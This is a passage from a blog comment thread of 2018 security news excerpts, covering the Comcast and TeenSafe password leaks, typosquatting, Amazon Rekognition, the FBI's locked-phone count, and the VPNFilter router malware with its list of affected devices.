To protect yourself against this vulnerability, and a lot of others, disable HTML rendering in your email client. Many email clients allow for this and/or have settings to disable the loading of remote content.
Tomi Engdahl says:
Comcast is (update: was) leaking the names and passwords of customers’ wireless routers
https://techcrunch.com/2018/05/21/comcast-is-leaking-the-names-and-passwords-of-customers-wireless-routers/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook
Comcast has just been caught in a major security snafu: revealing the passwords of its customers’ Xfinity-provided wireless routers in plaintext on the web. Anyone with a subscriber’s account number and street address number will be served up the Wi-Fi name and password via the company’s Xfinity internet activation service.
Update: Comcast has taken down the service in question. “There’s nothing more important than our customers’ security,” a Comcast representative said in a statement.
Tomi Engdahl says:
How to prevent a typo from making you an identity theft victim
https://www.washingtonpost.com/news/get-there/wp/2018/05/03/how-to-prevent-a-typo-from-making-you-an-identity-theft-victim/?noredirect=on&utm_term=.276621c04784
I’ve typed in an Internet address and with the slip of a finger ended up on some funky website. One typo.
Scammers love typos. And to capitalize on them, they hijack popular web addresses and cybersquat on URLs that are a typo away from legitimate websites. It’s a scheme called “typosquatting,” and it is intended to trick Internet users, according to Fraud.org, a project of the National Consumers League.
“If a user is unlucky enough to mistakenly type in the wrong address, they may be taken to a booby-trapped website filled with viruses and malware, or to a website that looks just like the legitimate website but is designed to gather their personal data for scammers,”
Close to 12 million online users visited potentially dangerous websites during the first quarter of this year
Krebs warned readers that “malicious websites ending in ‘.cm’ that mimic some of the world’s most popular Internet destinations
Here are two of the tips.
— Double check what you’re typing.
— Bookmark websites you visit often
Tomi Engdahl says:
Amazon facial recognition software raises privacy concerns with the ACLU
https://techcrunch.com/2018/05/22/amazon-facial-recognition-software-raises-privacy-concerns-with-the-aclu/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook
Amazon hasn’t exactly kept Rekognition under wraps. In late 2016, the software giant talked up its facial detection software in a relatively benign AWS post announcing that the tech was already being implemented by The Washington County Sheriff’s Office in Oregon for suspect identification.
The ACLU of Northern California is shining more light on the tech this week
“raises profound civil liberties and civil rights concerns.”
Tomi Engdahl says:
Teen monitoring app TeenSafe exposes thousands of passwords
https://techcrunch.com/2018/05/21/teen-monitoring-app-teensafe-exposes-thousands-of-passwords/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook
U.K.-based security researcher Robert Wiggins has found two exposed TeenSafe servers, leaking the passwords and information of some users of the monitoring service.
TeenSafe is meant to protect teenagers by letting their parents monitor their texts, phone calls, web history, location and app downloads. The breach was first reported by ZDNet.
According to the report, TeenSafe left two of their servers, which were hosted on AWS, exposed and viewable by anyone.
Tomi Engdahl says:
FBI’s flawed phone tally blamed on programming error. 7,800 unbreakable mobes? Er, um…
We meant 1,000. Maybe 2,000
https://www.theregister.co.uk/2018/05/23/feds_flawed_phone_tally_blamed_on_programming_error/
The FBI apparently gilded the lily in its long campaign against consumer cryptography, telling the world it held more locked phones than it did.
At issue is the Feds’ claim that it’s seized 7,000 phones it can’t crack because they’re encrypted.
He upped the ante in December 2017, telling a Congressional budget hearing the FBI couldn’t access the content of “approximately 7,800 mobile devices” in spite of having the legal authority to.
However, the Washington Post is now reporting that number was “inflated”, and instead, the FBI only has between 1,000 and 2,000 phones.
The WashPo said the error was discovered about a month ago, and since then the FBI has been trying to get a more accurate count, and an audit could take weeks.
The agency gave the newspaper a statement blaming the error on “programming errors” that delivered “significant over-counting of the devices reported”.
Tomi Engdahl says:
Jim Finkle / Reuters:
Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …
Cyber researchers, Ukraine warn of possible Russian attack
https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9
Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.
The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.
Cisco, which uncovered the campaign several months ago, alerted authorities in Ukraine and the United States before going public with its findings about the malware it dubbed VPNFilter.
Cisco described the mechanisms that the malware uses to hide communications with hackers and a module that targets industrial networks like ones that operate electric grids, said Michael Daniel, chief executive officer of Cyber Threat Alliance, a nonprofit group.
VPNFilter has infected devices in at least 54 countries, but by far the largest number is in Ukraine
Tomi Engdahl says:
Yubico and LastPass bring NFC-based two-factor authentication to the iPhone
https://www.zdnet.com/article/yubico-and-lastpass-bring-nfc-based-two-factor-authentication-to-the-iphone/
Popular password manager LastPass delivers the first iOS app with support for the YubiKey NEO hardware-based authentication key with NFC support.
Tomi Engdahl says:
Exclusive: FBI Seizes Control of Russian Botnet
https://amp.thedailybeast.com/exclusive-fbi-seizes-control-of-russian-botnet
FBI agents armed with a court order have seized control of a key server in the Kremlin’s global botnet of 500,000 hacked routers, The Daily Beast has learned. The move positions the bureau to build a comprehensive list of victims of the attack, and short-circuits Moscow’s ability to reinfect its targets.
The FBI counter-operation goes after “VPN Filter,” a piece of sophisticated malware linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.
New VPNFilter malware targets at least 500K networking devices worldwide
https://blog.talosintelligence.com/2018/05/VPNFilter.html
Tomi Engdahl says:
VPNFilter: New Router Malware with Destructive Capabilities
Unlike most other IoT threats, malware can survive reboot.
https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware
A new threat which targets a range of routers and NAS devices is capable of knocking out infected devices by rendering them unusable. The malware, known as VPNFilter, is unlike most other IoT threats because it is capable of maintaining a persistent presence on an infected device, even after a reboot. VPNFilter has a range of capabilities including spying on traffic being routed through the device. Its creators appear to have a particular interest in SCADA industrial control systems, creating a module which specifically intercepts Modbus SCADA communications.
According to new research from Cisco Talos, activity surrounding the malware has stepped up in recent weeks and the attackers appear to be particularly interested in targets in Ukraine.
Q: What devices are known to be affected by VPNFilter?
A: To date, VPNFilter is known to be capable of infecting enterprise and small office/home office routers from Linksys, MikroTik, Netgear, and TP-Link, as well as QNAP network-attached storage (NAS) devices. These include:
Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS251
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN
Q: How does VPNFilter infect affected devices?
A: Most of the devices targeted are known to use default credentials and/or have known exploits, particularly for older versions. There is no indication at present that the exploit of zero-day vulnerabilities is involved in spreading the threat.
Tomi Engdahl says:
Troy Hunt and Have i Been Pwned
http://www.bosslevelpodcast.com/troy-hunt-and-have-i-been-pwned/
My guest for this episode is Troy Hunt, well known security expert and creator of haveibeenpwned.com. It’s a service which allows you to check, whether your email has been leaked as a part of a data breach.
We talk about online security, including securing your accounts and using a password manager.